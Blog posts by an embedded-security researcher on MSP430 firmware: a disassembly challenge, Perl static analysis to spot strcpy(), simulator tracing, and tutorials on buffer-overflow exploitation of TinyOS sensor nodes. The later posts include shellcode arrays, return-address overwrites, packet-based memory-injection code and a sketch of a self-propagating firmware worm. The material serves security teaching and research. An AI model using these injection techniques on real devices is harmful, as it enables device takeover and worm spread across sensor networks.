Abesq: assembly language

Tampilkan postingan dengan label assembly language. Tampilkan semua postingan

Selasa, 19 Mei 2009

MSP430 Challenge of May 2009

Howdy neighbors,

The following image is a piece of disassembled code that was compiled for the MSP430F1611. The code is found in many programs, but in this one it is accidentally vestigial as a result of a compiler bug. Please comment as to (1) which compiler generated the code, (2) what the code was intended to do, and (3) why the code is vestigial in the example, but might not be in another program. Translations to C or psuedocode and commented write-ups are also nice. The MSP430F1xx Family Guide might be handy if you're unfamiliar with the architecture.

I'll send a GoodFET board to the most insightful commentator, but as I send those boards out to anyone who asks, you're really only commenting for the neighborliness of it all. If I get enough replies, I'll post one of these each month.

Also, I saw a lot of good work on last month's Masked ROM Challenge while I was a Cleveland, but next to nothing has been sent my way. If you made significant progress, such as semi-automated extraction of the bits, please email me.

--Travis Goodspeed
<travis at radiantmachines.com>

Rabu, 23 Januari 2008

Static Analysis of MSP430 Firmware in Perl

by Travis Goodspeed <travis at utk.edu>
at the Extreme Measurement Communications Center
of the Oak Ridge National Laboratory

That which follows is an adaption of notes which I made during the course of writing msp430static, a sort of poor man's IDA Pro for static analysis of MSP430 firmware without source code.

What Functions Look Like

A call to strcpy, such as the one which follows, is accomplished by populating r15 with the destination address and r14 with the source address, then calling the function at its hex address. In the following example, foo is the target (r15) and babe is the source (r14). See my article on IAR's MSP430 calling conventions for references to calling convention documentation for various compilers, as each compiler seems to do something different on this platform.

strcpy(foo,babe);                                                                                                                                                     
   1154:       3e 40 7a 02     mov     #634,   r14     ;#0x027a                                                                                                        
   1158:       0f 44           mov     r4,     r15     ;                                                                                                               
   115a:       b0 12 a4 11     call    #4516           ;#0x11a4

In the unstripped binary, we'll find the code for strcpy at the address (0x11a4) called above:

000011a4 <strcpy>:
   11a4:       0d 4f           mov     r15,    r13     ;                                                                                                               
   11a6:       0c 4f           mov     r15,    r12     ;                                                                                                               
   11a8:       6f 4e           mov.b   @r14,   r15     ;                                                                                                               
   11aa:       cd 4f 00 00     mov.b   r15,    0(r13)  ;                                                                                                               
   11ae:       4f 93           cmp.b   #0,     r15     ;r3 As==00                                                                                                      
   11b0:       07 24           jz      $+16            ;abs 0x11c0                                                                                                     
   11b2:       1e 53           inc     r14             ;                                                                                                               
   11b4:       1d 53           inc     r13             ;                                                                                                               
   11b6:       6f 4e           mov.b   @r14,   r15     ;                                                                                                               
   11b8:       cd 4f 00 00     mov.b   r15,    0(r13)  ;                                                                                                               
   11bc:       4f 93           cmp.b   #0,     r15     ;r3 As==00                                                                                                      
   11be:       f9 23           jnz     $-12            ;abs 0x11b2                                                                                                     
   11c0:       0f 4c           mov     r12,    r15     ;                                                                                                               
   11c2:       30 41           ret

The stripped binary has the function at the same address, but has no function label. In fact, there isn't even a note (in msp430-objdump) that the address is the beginning of a function.

   11a4:       0d 4f           mov     r15,    r13     ;                                                                                                               
   11a6:       0c 4f           mov     r15,    r12     ;                                                                                                               
   11a8:       6f 4e           mov.b   @r14,   r15     ;                                                                                                               
   11aa:       cd 4f 00 00     mov.b   r15,    0(r13)  ;                                                                                                               
   11ae:       4f 93           cmp.b   #0,     r15     ;r3 As==00                                                                                                      
   11b0:       07 24           jz      $+16            ;abs 0x11c0                                                                                                     
   11b2:       1e 53           inc     r14             ;                                                                                                               
   11b4:       1d 53           inc     r13             ;                                                                                                               
   11b6:       6f 4e           mov.b   @r14,   r15     ;                                                                                                               
   11b8:       cd 4f 00 00     mov.b   r15,    0(r13)  ;                                                                                                               
   11bc:       4f 93           cmp.b   #0,     r15     ;r3 As==00                                                                                                      
   11be:       f9 23           jnz     $-12            ;abs 0x11b2                                                                                                     
   11c0:       0f 4c           mov     r12,    r15     ;                                                                                                               
   11c2:       30 41           ret

It's easy enough to detect the presence of this code in a stripped executable by looking for "mov r15, r12" or "0x0c 0xf4" and comparing the bytes that follow. I can't stress enough the importance of endian-awareness: the second column is composed of bytes, not words. As a word, "mov r15,r12" is 0xf40c. When in doubt, double-check yourself with the Single Line MSP430 Assembler.

Note that calling conventions vary considerably across the many MSP430 compilers and even among versions of the same compiler, depending upon optimization options and inlining. Don't expect all calls to look like this: check for yourself.

Before looking at a decompilation of the above, notice that a reasonably large string of bytes {6f 4e, cd 4f 00 00, 4f 92} appears twice. This duplicity might be removed by another optimizer, but it shows that something in the code is sufficiently intrinsic to the function to appear twice in one function. Perhaps it will remain consistent across compilers? In point of fact, this expanse of code copies a byte from the address contained within r14 to the address contained within r13. The final word compares the byte that was copied to zero. In the first usage, the function jumps to the end in the event that the comparison is zero. In the second usage, which follows the incrementing of both r14 and r15, the jump is backward if the comparison is not zero. A rough approximation in psuedo-C follows

char* strcpy(char* dest, char* src){
a=dest;       //mov r15, r13
b=dest;       //mov r15, r12

c=*src;       //mov.b @r14, r15
*a=c;         //mov.b r15, 0(r13)
if(c==0)      //cmp.b #0, r15
 goto ret;    //jz $+16

do{
 src++;       //inc r14
 a++;         //inc r13
 c=*src;      //mov.b @r14, r15
 *a=c;        //mov.b r15, 0(r13)
}while(c!=0)  //cmp.b #0, r15
              // jnz #-12

ret:
 return b;    //mov r12, r15
}             //ret

In the decompilation, I refer to r15 as both dest and c, as its purpose changes completely. Variables are passed as dest=r15 and src=r14, as GCC allocates parameters in the order r15, r14, r13, r12. The result, for strcpy() the destination address, is returned in r15.

It is apparent that this could be written a bit more compactly by merging the first and second stanzas. Also, the use of the indirect auto-increment addressing mode (As=11, of the form @Rn+) could eliminate the "inc r14" line. The instructions might also be reordered, and any number of register combinations might be used to hold intermediate values. It's not possible to detect all the ways in which strcpy() might be implemented, but it shouldn't be too difficult to detect the different ways in which it will be implemented. After all, it's far easier to fix an overflow vulnerability than to hide it; is it not?

Testing my theory, I disassembled the same program, this time compiled with IAR's compiler (V4.09A/W32). Grepping for cmp.b yielded a single line, at address 0xF86E, in the codeblock which follows.

   f864:       0f 4c           mov     r12,    r15     ;                                                                                                               
   f866:       0e 4c           mov     r12,    r14     ;                                                                                                               
   f868:       1c 53           inc     r12             ;                                                                                                               
   f86a:       fe 4d 00 00     mov.b   @r13+,  0(r14)  ;                                                                                                               
   f86e:       ce 93 00 00     cmp.b   #0,     0(r14)  ;r3 As==00                                                                                                      
   f872:       f9 23           jnz     $-12            ;abs 0xf866                                                                                                     
   f874:       0c 4f           mov     r15,    r12     ;                                                                                                               
   f876:       30 41           ret

Those that have read my article on the register usage of IAR will note that the ABI is different in the code sample above. IAR fixed the register allocation order in October of 2007, and it now allocates registers in the order r12, r13, r14, r15.

This code is heavily--but imperfectly--optimized, so it's a bit difficult to decompile by hand. It all becomes clear when you realize that r12 is post-incremented and the original value is loaded into r14, the destination address for each character. Unlike GCC, the indirection post-increment addressing mode is used, but on the very next line we see that this necessitates another RAM access! Perhaps the cache will take care of it, but this means that IAR makes three memory accesses--one write and two reads--for every two that GCC makes. I'd recommend hand optimization for this function, if my stronger recommendation wasn't to scrap it as a troublemaker.

The decompiled code follows,

char* strcpy(char* dest, char* src){
char *a,
    *b=dest;      //mov r12, r15
do{
 a=dest;          //mov r12, r14
 dest++;          //inc r12
 *(a++)=*src;     //mov.b @r13+, 0(r14)
}while(0!=*src);  //cmp #0, 0(r14)
                  //jnz $-12
return b;         //mov r15, r12
                  //ret
}

I'd be willing to bet that the original is quite a bit denser in C, but this ought to be easy enough to understand.

So how do we do a generalized search for this, one which will recognize most implementations by most compilers? I propose a pattern that looks for the following:

The use of two registers, source pointer SRC and destination pointer DEST.
A mov.b instruction with SRC as the source. (Call the destination FOO)
A mov.b instruction with DEST as the destination. (Call the source BAR.)
A cmp.b instruction involving the immediate zero and the register SRC, DEST, FOO, or BAR.

I don't demand an inc for SRC as it might be auto-incremented (@Rn+), and I don't demand one for DEST as it might be copied from another variable in an IAR post-increment (cvar++).

It's possible to add more rules which describe the preceding examples. For example, both of these examples move their first parameter to a temporary register and, later, move it back. Both follow the cmp.b with a jnz. I advise against making any matching pattern too strict, as it'll result in false negatives. Keeping things loose might result in false positives, but those false positives will be fertile ground for exploits of their own, even if they aren't strcpy().

It's also worth noting that a ruleset that's complex is easy to sneak by, either intentionally or accidentally. Suppose this pattern were modified to exclude strncpy(). The following strcpy() implementation would skate by, undetected.

char *strcpy(char *dest, char *src){
 return strncpy(dest,src,0x1000);
}

By keeping rules loose--but perhaps prioritized--it's easy to catch such actions. After all, what byte-wise copying until reaching zero is not suspicious?

Recognizing Functions from Perl

Now that the hand analysis is complete, it's time to bring perl into the mix. Instructions are recognized as one of two types: code and IVT entries. I ignore the .data section for now, but a little tweaking of the regular expressions would make it match. I make the assumption that every function begins after a 'ret' and ends with a 'ret'. This isn't strictly true, but it suffices for this article and ought only to miss the first function in memory, assuming everything is built with C.

The first step is to recognize individual lines. I used the following regular expressions in an early revision:

Match an instruction:
   #    11b6:       6f 4e           mov.b   @r14,   r15     ;
   #    11b8:       cd 4f 00 00     mov.b   r15,    0(r13)  ;
   #    1111:       22222222222     33333   44444444444444  555555
   /\s(....):\s(.. .. .. ..)\s\t([^ \t]{2,5})\s(.*);?(.*)/
Match an IVT entry:
   #    fffe:       00 11           interrupt service routine at 0x1100
   /[\s\t]*(....):[\s\t]*(.. ..)[\s\t]*interrupt service routine at 0x(....)/

Although I don't strictly need to parse so much detail to recognize strcpy(), it will be helpful when I add features.

Once lines are recognized, they are loaded into a list of strings, indexed by the integer (not hex-string) value of the first field. I make a list of strings, rather than objects, because most comparisons can be performed by regular expressions. This is fine for a 16-bit microcontroller, but might be prohibitively expensive for something larger.

Routines are recognized--as I've previously stated--by assuming that they reside between ret statements. This assumption makes things quite easy to implement, but results in the loss of the first function as well as the concatenation of functions--such as main()--which do not return. In the following example main [118E to 11A0] and strcpy [11A4 to 11C2] are combined into a single listing:

   118e:       31 40 00 0a     mov     #2560,  r1      ;#0x0a00
   1192:       04 41           mov     r1,     r4      ;
   1194:       92 43 00 02     mov     #1,     &0x0200 ;r3 As==01
   1198:       b0 12 40 11     call    #4416           ;#0x1140
   119c:       b0 12 68 11     call    #4456           ;#0x1168
   11a0:       30 40 c4 11     br      #0x11c4         ;
   11a4:       0d 4f           mov     r15,    r13     ;
   11a6:       0c 4f           mov     r15,    r12     ;
   11a8:       6f 4e           mov.b   @r14,   r15     ;
   11aa:       cd 4f 00 00     mov.b   r15,    0(r13)  ;
   11ae:       4f 93           cmp.b   #0,     r15     ;r3 As==00
   11b0:       07 24           jz      $+16            ;abs 0x11c0
   11b2:       1e 53           inc     r14             ;
   11b4:       1d 53           inc     r13             ;
   11b6:       6f 4e           mov.b   @r14,   r15     ;
   11b8:       cd 4f 00 00     mov.b   r15,    0(r13)  ;
   11bc:       4f 93           cmp.b   #0,     r15     ;r3 As==00
   11be:       f9 23           jnz     $-12            ;abs 0x11b2
   11c0:       0f 4c           mov     r12,    r15     ;
   11c2:       30 41           ret

This happens because main() returns not by "ret" but by branching to 0x11C4, which is __stop_progExec__ in the firmware being analyzed. An alternate method would be to look for call targets, assuming that 0x11A4 is the beginning of a function because some other instruction calls it.

By searching by call targets, my script correctly recognizes the second function of the preceding example, but it no longer recognizes main(), which in GCC is called by "BR #addr" and not "CALL #addr". A quick check on a small GCC program shows that absolute jumps are only used for main() and non-user functions. Thus, by looking for "CALL #addr" and "BR #addr", it is possible to find the entry points of most if not all functions.

Once functions can be been identified, it isn't very difficult to add an output mode for Graphviz. The following image is a call tree in which main() calls two functions which call strcpy(). Dangerous functions and calls are labeled in red. The two islands on the right--which prevent this from being a Tree in the graph theory sense--exist in assembly as infinite loops.

Further, it's also useful to produce memory maps which detail memory usage. These can be produces from the database by dumping to a graphics programming language. My first revision published to LaTeX/PSTricks. This looks beautiful, but rendering everything as vector art quickly makes a complex memory map unmanageable. My solution was a rewrite that prints raw postscript. Both are shown below.

Conclusion

I've named the tool msp430static, and I intend to publish a revision as soon as I clean up the code. It's a decent hack at this point, but a hack isn't maintainable and I shudder to think at how I'll comprehend these few hundred lines of perl in three months' time without mush revision.

My redesign will feature an SQL backend, such that the input file needn't be reparsed for each minor revision. This will also allow for scripting in languages other than perl. A single command will stock a database of a defined schema, a second will analyze the database, and others will produce output or analysis. I intend to do most analysis in a self-contained perl script, but clients may be written in a variety of languages as appropriate. I'm undecided as to whether I'll make the tool architecture-agnostic in this revision. It's possible, but perhaps that's more appropriate for a later revision. Potential clients include a modified msp430simu and a GTK# GUI.

I don't intend to make a public release of the present version, but I'll send individual copies by email upon request.

Minggu, 13 Januari 2008

MSP430simu and LaTeX, part 2

by Travis Goodspeed <travis at utk.edu>
at the Extreme Measurement Communications Center
of the Oak Ridge National Laboratory

After writing my previous article, Tracing with MSP430simu, LaTeX, and PowerPoint, I found that I had left a few things unsaid. I'll cover them here, refraining from reiterating the basics.

addr2line

An essential part of any debugger that will be used by mere mortals--which includes a reverse engineer when working on anything other than his pet project--is the ability to print function names instead of hexadecimal addresses. In unix, this is accomplished by addr2line, which may be called thusly:

karen% msp430-addr2line -e overflow.elf 01182 -f -s
myfn
mysource.c:15
karen%

This tells me that 0x1181 is a machine-language instruction from line 15 of mysource.c, which is somewhere within the function myfn(). In my franken-python, I grab function name and file/line number with

    def addr2line(self,addr):
      import os
      app = os.popen("msp430-addr2line -e overflow.elf 0x%04X -f -s " % addr, "r");
      text = app.read();
      app.close();
      return text;

Note that I hardwired the executable filename, application, and platform. This is very bad practice, but as I warned in my first article, this is a quick hack to generate conference slides. Use something better in your own implementation. (Even if you just need to generate conference slides of your own.)

stack traces

Printing a stack trace is just as easy, if we make the--perhaps incorrect--assumption that a stack trace is just a list of pointers that begins at the top of RAM and grows downward until the address contained within the SP (Stack Pointer) register. By use of addr2line(), it isn't difficult to get a human-readable stack trace.


  def stacktrace(self,sp):
      s=int(sp);
      trace='';
      if int(sp)>0x200: #make sure it's in ram                                                                                                     
         for l in range(0xA00, s-2, -2): #scaled from sp to top of ram                                                                              
            fn=self.addr2line(self.getint(l));
            trace+=("0x%04X %s" % (l, fn));
      trace+="SP     %s" % self.addr2line(int(self.PC));
      return trace;

This code is supposed to count each even line in the range [0xA00,s], printing each address whose contents is a function name. I'm unfamiliar with Python.

_reset_vector__

The reset-vector loads RAM with values from ROM. This is essential in a real system, as you'll want an application to run again after RAM has cleared, but it's terribly inconvenient when trying to view an execution trace. The first several frames will be nothing but globals being initialized. For this reason, I added a simple if() statement that refuses to print a frame in batch mode if -1==str.find(fn,"reset_vector").

By searching for _vector(), it's possible to drop all vector handlers, though I've only encountered _reset_vector__ in this project.

Stack Variables

The above is all well and good if the stack contains only points of execution; however, my presentation required that stack variables be shown. Good heavens, how can that be done? Trying addr2line on 0x200 gives:

karen% msp430-addr2line -e simu/overflow.elf 0x202 -f -s
__data_start
??:0
karen%

Thus, any entry that's a pointer to a global variable will give __data_start as its function name, even though it can't supply a line number. I get more luck with

karen% nice msp430-objdump -g simu/overflow.elf | grep 0x202
char foo[12]:uint16 /* 0x202 */;
karen%

As for the question of what data-type is on the stack, I have yet to come up with an adequate solution. I could run objdump into a database, but I'm still left the problem of determining whether the 0x0202 on the stack is a pointer to foo[], an integer, two characters, etc. Expect a third installment of my msp430simu series detailing a solution, but with my slides due in twenty-two hours and my coffee-tin empty, I'll have to overlook it for this draft.

(I'll likely solve this by watching for PUSH and POP instructions. This would let me see the difference between a local variable and a function call.)

As mentioned in my prior article, the presentation has to create a new frame whenever a watched variable is changed. I'm trying to demonstrate a stack overflow, so it's essential that a presentation frame be generated when the stack changes. As such, my actual demonstration prints more than that which is presented here. I print the function name as "RAM" for anything less than the SP, "STACK" for anything greater than that but less than 0x0A00.

A sample stack dump slide block--prior to formatting--follows:
stackdump screenshot

Hacking the Debugger!

At some point, I made a modification that conflicts with the debugging framework that's included with msp430simu. Rather than try to reconcile the changes, I just discontinued use of it. Note that TEST() and END_TEST must still be called in main() to keep the function from dying.

What could be cooler, in a hacking demo, than to have the hack mess with the debugger from inside of a simulation? Looking at test_puts(), you'll find a while-loop that copies a string to TEST_TEXTOUT. To call it from assembly, just load the first character's address in R15 and jump to the address of test_puts, which is 0x1140 in my present revision but likely won't remain that for long. In machine language, this can be accomplished in no more than eight bytes: four to load the string's address in R15, and four to jump to the function. (Assuming, of course, that the fixed addresses are known.) Other hacks are certainly possible. Try disassembling some functions with msp430-objdump foo.elf -d | less to see what you can come up with.

Commentary

As depicted above, my slides now properly render, showing most of what's needed from the machine. Only two items remain: commentary and section titles. These two features might have been implemented by a better stack analyzer, but my solution was to specify the slide section through a watched variable. A 16-bit integer is set at the entrance to a function which I'd like to watch, which is the index of a string in my perl script. Commentary is then loaded by calling \input{} in LaTeX on the appropriate include file, which contains anything I would like to be in the left box.

Conclusion

A snazzy draft which simulates a stack overflow attack is available as msp430simu_tidc08.pdf. As with all of my presentations, it makes little sense without spoken commentary, but it's a good example of what can be done with a little bit of work and a CPU simulator.

Minggu, 23 September 2007

Memory-Constrained Code Injection

by Travis Goodspeed <travis at utk.edu>
at the Extreme Measurement Communications Center
of the Oak Ridge National Laboratory

Introduction

When injecting code into an embedded system, as has demonstrated in the prior article, entitled MSP430 Buffer Overflow Exploit for Wireless Sensor Nodes, the limitation of code size frequently comes up. The following will explain how a 128-byte packet can be used to inject an exploit much longer than itself. This method would also work in workstation and server attacks, but is less valuable in such environments because such platforms lack the prohibitive memory constraints that are to be found in embedded systems.

It is assumed that the reader is familiar with the previously referenced article, and it is further assumed that a method for injecting short fragments of machine code exists. These examples are specific to TinyOS 2.x on the MSP430, but the principles in question should be of relevance for any resource-constrained target over a datagram channel of limited packet size.

General

The method which will be presented makes use of unallocated memory as a buffer into which a large payload, one that is larger than any individual packet, is populated by a series of code injections, each of which loads a short piece of the larger payload before returning to normal execution.

Each packet will set a single word of memory to a word from its payload, thus copying as many words as are required from the attacker to the victim, loading them at whatever address is specified. So long as the target address lies beneath the stack and above the heap, it will not interfere with the operation of the victim's firmware and will not be damaged or overwritten by another subroutine.

The memory layout looks something like this:


(Top of Memory, 0xFFFF)
Internal Flash{
  Interrupt Vector Table
  Data/Code
}
Internal Ram{
  Stack (grows down)
  Unused (between heap and stack)
  Heap (grows up, often empty)
  Globals
  Memory-mapped I/O
}
(Bottom of Memory, 0x0000)

The payload will be housed in the unused region between the stack, which grows downward from the top of memory, and the heap, which grows upward from the bottom of memory.

Specific

Suppose that an attacker is capable of broadcasting packets which allow for a six-byte payload to be executing on a victim. Further, suppose that the attacker wishes to execute a single block PB of 256 bytes of machine code at address TA, within a contiguous region and without interruption.

The attacker can craft a memory-injection (MI) packet which sets an address to a value. In MSP430 assembly, this is expressed as

MOV.W #val, &addr

which sets the word at memory location addr to val. To place the value DEAD at the memory location BEEF, one would use

MOV.W #0xdead, &0xbeef

As machine language using absolute addressing, this would be

{0x40b2, 0xdead, 0xbeef}

The latter two words may be substituted as required, making it trivial to have a function write injection code on the fly, such as


/*! Takes a pointer to a six-byte region which is populated
*  with machine code for setting the value at the address.
*/
void attackcode_set(uint16_t *code,
                   uint16_t address,
                   uint16_t value){
    code[0]=0x40b2;
    code[1]=value;
    code[2]=address;
}

Thus to copy an expanse of code to the victim, the attacker would compose 128 injection attacks by composing payloads with the following loop:


//Populate the buffer MI with memory injections to place all of PB at TA
for(int i=0;i<0x50;i++)
  attackcode_set(MI[i], TA+2*i, PB[i]);

Each packet of MI[] is then broadcast in any order whatsoever. As each packet is received, another two bytes near TA, the target address, are set. Thus, two bytes at a time, the whole payload is transfered to the victim. Once they've been delivered, a new injection is passed but one that doesn't execute itself. Rather, it jumps to TA to begin the previously loaded code, all 256 bytes of it.

Injection of Complete Firmware

Once this longer payload has been installed, it can be used to copy a portion of itself to external flash. This can be repeated until a complete firmware--that is to say software which resides in internal flash--exists on external flash. Then a short loader routine could copy it from external to internal flash, thereby replacing the victim's firmware with the attacker's. If this new firmware were to begin broadcasting its own installation routine, the result would be a self-propagating worm.

Conclusion

One should never assume that an embedded platform is safe from a sophisticated injection behavior because of the limitations imposed by a datagram networking framework, such as 802.15.4. Even without streaming or the buffering of prior packets, it's possible--in fact rather trivial--to inject a payload significantly larger than the packet size.

Please contact me if you know of any prior implementation or discussion of this technique. I would be much obliged.

Jumat, 03 Agustus 2007

MSP430 Buffer Overflow Exploit for Wireless Sensor Nodes

by Travis Goodspeed <travis at radiantmachines.com>

Abstract

What follows is a detailed account of the creation of a stack-overflow exploit targeting TinyOS 2.x on a Tmote Sky wireless sensor node, which uses the Texas Instruments MSP430 microcontroller. An example application is used as a target, rather than one which might be found in the wild. A firm knowledge of C, assembly language, and embedded systems architectures is assumed, but the details of NesC, the MSP430, and TinyOS are reviewed for those new to this platform. Finally, preventative measures are discussed.

Before We Begin

By default, the NesC compiler attaches the inline keyword to every function that it generates, even if that function began as a C function. To prevent this, use __attribute__ ((noinline)). Without this attribute, you'll go through hell trying to understand a function with twenty others embedded within it. Note that the inline keyword isn't what makes these attacks possible, it just makes them easier to understand.

Disassembly

I'll begin with a short example which uses gdb on a local image of a simple TinyOS application. This requires msp430-gdb, but does not require a JTAG debugger or any physical hardware.

Use the "disassemble" command to view an individual function.


(gdb) disassemble RadioCountToLedsC$red
Dump of assembler code for function RadioCountToLedsC$red:
0x000053f4 <radiocounttoledsc$red+0>:   mov.b   #1,     r15     ;r3 As==01
0x000053f6 <radiocounttoledsc$red+2>:   call    #21500          ;#0x53fc
0x000053fa <radiocounttoledsc$red+6>:   ret
End of assembler dump.
(gdb)

The original source for for this was

//within RadioCountToLedsC implementation
void __attribute__ ((noinline)) red(){
call Leds.set(1);
}

Note that the function acts just as its C equivalent would. red+0 loads the constant #1 from the constant generator r3 into r15, the register which contains the first parameter to a C function in the MSP430 version of GCC. A call is then made to 0x53fc, which we know as Leds.set().

Disassemble also accepts an address as its argument, so let's take a peek under the hood and see what Leds.set() does.


(gdb) disassemble 0x53fc
Dump of assembler code for function LedsP$Leds$set:
0x000053fc <ledsp$leds$set+0>:  push    r11             ;
0x000053fe <ledsp$leds$set+2>:  mov.b   r15,    r11     ;
0x00005400 <ledsp$leds$set+4>:  call    #16460          ;#0x404c
0x00005404 <ledsp$leds$set+8>:  mov.b   r15,    r14     ;
0x00005406 <ledsp$leds$set+10>: mov.b   r11,    r15     ;
0x00005408 <ledsp$leds$set+12>: and.b   #1,     r15     ;r3 As==01
0x0000540a <ledsp$leds$set+14>: jz      $+10            ;abs 0x5414
0x0000540c <ledsp$leds$set+16>: and.b   #-17,   &0x0031 ;#0xffef
0x00005412 <ledsp$leds$set+22>: jmp     $+8             ;abs 0x541a
0x00005414 <ledsp$leds$set+24>: bis.b   #16,    &0x0031 ;#0x0010
0x0000541a <ledsp$leds$set+30>: mov.b   r11,    r15     ;
0x0000541c <ledsp$leds$set+32>: and.b   #2,     r15     ;r3 As==10
0x0000541e <ledsp$leds$set+34>: jz      $+10            ;abs 0x5428
0x00005420 <ledsp$leds$set+36>: and.b   #-33,   &0x0031 ;#0xffdf
0x00005426 <ledsp$leds$set+42>: jmp     $+8             ;abs 0x542e
0x00005428 <ledsp$leds$set+44>: bis.b   #32,    &0x0031 ;#0x0020
0x0000542e <ledsp$leds$set+50>: mov.b   r11,    r15     ;
0x00005430 <ledsp$leds$set+52>: and.b   #4,     r15     ;r2 As==10
0x00005432 <ledsp$leds$set+54>: jz      $+10            ;abs 0x543c
0x00005434 <ledsp$leds$set+56>: and.b   #-65,   &0x0031 ;#0xffbf
0x0000543a <ledsp$leds$set+62>: jmp     $+8             ;abs 0x5442
0x0000543c <ledsp$leds$set+64>: bis.b   #64,    &0x0031 ;#0x0040
0x00005442 <ledsp$leds$set+70>: mov.b   r14,    r15     ;
0x00005444 <ledsp$leds$set+72>: call    #16480          ;#0x4060
0x00005448 <ledsp$leds$set+76>: pop     r11             ;
0x0000544a <ledsp$leds$set+78>: ret
End of assembler dump.
(gdb)

Note that this comes from the NesC declaration of

async command void set(uint8_t val);

which suggests that commands are rendered straight to C functions with the call keyword merely calling the function. In actual usage, call is used not to determine the way in which the function is called, but whether it's allowed. A command may not be called from an interrupt handler unless it also possesses the async keyword. Note that set() would have been automatically inlined if it had not been called from multiple source functions.

Inline Assembly

Inline assembly language is quite easy as well. Suppose that we would like to find the value of the stack pointer:

  int __attribute__ ((noinline))
 getsp(){
 __asm__("mov r1, r15");
}

The preceding code simply copies r1, the Stack Pointer, into r15, which mspgcc's ABI uses as the return register. Testing the disassembled code gives us:

(gdb) disassemble RadioCountToLedsC$getsp
Dump of assembler code for function RadioCountToLedsC$getsp:
0x000053f4 <RadioCountToLedsC$getsp+0>: mov     r1,     r15     ;
0x000053f6 <RadioCountToLedsC$getsp+2>: ret
End of assembler dump.
(gdb)

Note the use of r15 is arbitrary--different compilers use the registers for different things. I've written an article comparing IAR's ABI to that of GCC which explains the issue in detail.

Machine Language

The following msp-gdb session shows how to get the getsp() function as its machine-language bytes rather than as disassembled code:

(gdb) x/bx RadioCountToLedsC$getsp
0x53f4 <RadioCountToLedsC$getsp>:       0x0f
(gdb)
0x53f5 <RadioCountToLedsC$getsp+1>:     0x41
(gdb)
0x53f6 <RadioCountToLedsC$getsp+2>:     0x30
(gdb)
0x53f7 <RadioCountToLedsC$getsp+3>:     0x41
(gdb)

In the above example, x/bx means "examine as hexadecimal bytes." I could also have used x/hx to examine half-word bytes (words are 32 bit here, not 16), but the little-endian nature of the target platform makes that a little confusing, as the bytes are printed out of order.

What this means is that we can declare a C byte array of {0x0f,0x41,0x30,0x41} or a string of "\x0f\x41\x30\x41" at any even address and execute a call to its address in order to execute it. The even addressing is essential, as r0--the PC--cannot hold an unaligned address and unaligned word accesses are not supported by the MSP430. Because this architecture is little endian, the code as a 16-bit integer array is not {0x0f41, 0x3041} but rather {0x410f,0x4130}.

I've been using gcc and gdb to generate machine code, but the mspgcc project has made a single-instruction assembler available through the web. Remember that it gives results as little-endian words.

Instruction Emulation

It's important to realize that MSP430 assembly language contains many statements which don't exist on the physical chip. Instead they're emulated by translation in the assembler.

For example, suppose we have the following function using inline assembly:

  void __attribute__ ((noinline))
 setled(){
 asm("inv &0x0031");
}

INV is an emulated instruction which flips the bits of its destination by XORing them with 0xFFFF. Why should the chip have a separate instruction, when the programmer could simply call XOR #-1,&0x0031? In practice, that is what happens as our disassembly shows:

(gdb) disassemble BlinkC$setled
Dump of assembler code for function BlinkC$setled:
0x00004712 <BlinkC$setled+0>:   xor     #-1,    &0x0031 ;r3 As==11
0x00004716 <BlinkC$setled+4>:   ret
End of assembler dump.
(gdb)

Machine Language Execution Example

After a bit of effort, which would've been greatly reduced if my Flash Emulation Tool had arrived, I came up with the following piece of code:

int machlang[15]={
   0xe3b2, 0x0031,   //xor #-1,&0x31    (emulating INV)
   0x4130            //ret
 };
 int (*machfn)() = NULL;
 machfn= (int (*)()) machlang;
 machfn();

The above code executes the machine language code to blink the LED by inverting the memory-mapped port at 0x31. The integers of machlang() may reside anywhere in the memory space, which is to say anywhere in RAM or ROM.

Buffer Overflow Stack Injection

Machine language injection works by virtue of the call stack, which grows downward in TinyOS from nearly the top of RAM (high address) to the bottom of RAM (low address, 0x200). When a function begins, the stack's lowest word contains the address of the calling function, such that when a function calls the "RET" instruction, it copies a value from the address pointed to by R1 (SP) into R0 (PC) and increments R1 to shrink the stack by a word.

The following code overwrites the stack's stored copy of the calling PC such that when it returns, control jumps to machlang instead of the calling function:

void __attribute__ ((noinline))
 setled(){
 //call it the rude way by overwriting the return address
 int *oldpc=&oldpc;//point to top of frame
 oldpc++;//inc by 2, not 1
 *oldpc=machlang;//overwrite old PC
 return;//return to machlang, not calling function
}

In the above code, the pointer oldpc is declared and incremented such that it points at the stack value pushed before itself, which is of course the stored PC value that the function will jump to when it returns. When return; is called, the processor jumps not to the calling function but rather to the machine code, causing it to be executed.

Buffer overflow injections work in a similar way, but rather than set the pointer explicitly by C code, they instead have a string that--when copied into a buffer--exceeds the end of the buffer and writes to the next position. The following code does just that, by calling strcpy() on a string composed of the machine language entry address repeated many times.

//code fragment: composition function
 //compose a null-terminated string
 //of repeating machlang addresses
 for(payload=evilcmd;
     payload<evilcmd+10;
     payload++){
   *payload=machlang;
 }
 *payload=0;//null-terminator

 //code fragment, copying function
 char cmd[6]="Hello";
 strcpy(cmd,evilcmd);
 return;//to machlang

 //new machlang to enter an infinite loop.
 int machlang[30]={
   0xe3b2, 0x0031,   //xor #-1,&0x31    (emulating INV)

   //while(1);
   0x4303,           //mov r3,r3        (emulating NOP)
   0x3fff,           //jmp -2
 };

This is a bit crude, in that it overwrites more than just the stored PC. Note, however, that the string can be dropped in with no specialized code in the copying function. In order to view the success of this, the machlang array must be changed to enter an infinite loop when complete. It cannot successfully return because it overwrote more than just the stack pointer it intended to. This is an unavoidable side-effect when the stack is as dense as it is on the MSP430, as the null terminator must be copied--thus unless the high word--that is the latter word in little endian--of the target address happens to be 0x00, the address immediately above that which we intend to overwrite must necessarily be clobbered.

Using a JTAG debugger (TI MSP-FETP430-PIF or TI MSP-FET430-UIF), it's trivial to view the stack. You'll notice that the stack is rather shallow, only two functions deep. As 'BlinkC$Timer0$fired' is called without stack parameters--those that don't fit into registers--a simple RET suffices to return past it. If parameters were on the stack, they could be removed with the POP instruction.

(gdb) break 'BlinkC$setled'
Breakpoint 1 at 0x4d46: file BlinkC.nc, line 99.
(gdb) continue
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
BlinkC$setled () at BlinkC.nc:99
(gdb) where
#0  BlinkC$setled () at BlinkC.nc:99
#1  0x00004d46 in BlinkC$Timer0$fired () at BlinkC.nc:128
#2  0x00004d46 in BlinkC$Timer0$fired () at BlinkC.nc:128
(gdb)

A Complete Exploit

